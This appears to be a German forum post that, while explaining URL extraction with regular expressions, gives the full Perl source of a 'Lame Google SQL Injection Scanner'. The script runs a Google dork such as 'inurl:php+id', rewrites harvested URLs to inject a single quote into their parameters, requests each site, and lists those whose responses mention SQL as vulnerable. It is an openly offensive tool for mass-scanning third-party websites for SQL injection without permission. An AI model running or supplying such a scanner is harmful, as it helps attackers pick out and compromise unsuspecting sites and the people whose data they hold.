Fisch die Urls halt über Regexp raus. Bsp von nem schwachsinnigen SQLi Scanner:
Code:
#!/usr/bin/perl
#Lame Google SQL Injection Scanner by h0yt3r
#Usage: perl google.pl [Keyword] [Offset]
#Expl: perl google.pl inurl:php+id 100
#If Offset == 1 -> Scan Site #1 to #100
#If Offset == 100 -> Scan Site #100 to #200 etc...
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9');
$ua->timeout(5);
$keyw = shift;
$offset = shift;
die("How bouta usage?!\n") if ( $offset !~ /\d+/ );
my @aUrls;
my @bUrls;
my $vulnCounter = 0;
my @vulns;
my $goodURL;
my $goodURL1;
####Google search...
$googlUrl =
"http://www.google.com/cse?&hl=de&num=100&start="
. $offset
. "&cx=013269018370076798483:gg7jrrhpsy4&cof=FORID:1&q="
. $keyw
. "&sa=Search";
my $response = $ua->get($googlUrl);
print "[x]Ok scanning: " . $googlUrl . "\n";
die("Connection failed!\n") unless ( $response->is_success );
foreach $urls ( $response->content =~ /(<span class=a>(.*?)<\/span>)/g ) {
$urls =~ s/<(\/.*?|b|.*=a)>//g;
( $goodURL = $urls ) =~ s/=\S+/=1%27/g unless ( $urls !~ /\.php\?\S+=/ );
if ( $goodURL1 ne $goodURL ) { $goodURL1 = $goodURL; }
else { next; }
push( @bUrls, $goodURL1 );
}
my @unique = ();
my %Seen = ();
foreach my $elem (@bUrls) {
next if $Seen{$elem}++;
push @unique, $elem;
}
foreach (@unique) {
$resp = $ua->get( "http://" . $_ );
print "Scanning " . $_ . "\n";
if ( $resp->content =~ /SQL/ ) #lulz
{
print "[x-->]" . $_ . " seems to be vulnerable!\n";
push( @vulns, $_ );
$vulnCounter++;
}
}
print "#############\nThere were totaly "
. $vulnCounter
. " sites vulnerable using dork "
. $keyw . ":\n";
$count = 1;
foreach (@vulns) {
print "[" . $count . "] http://" . $_ . "\n";
$count++;
}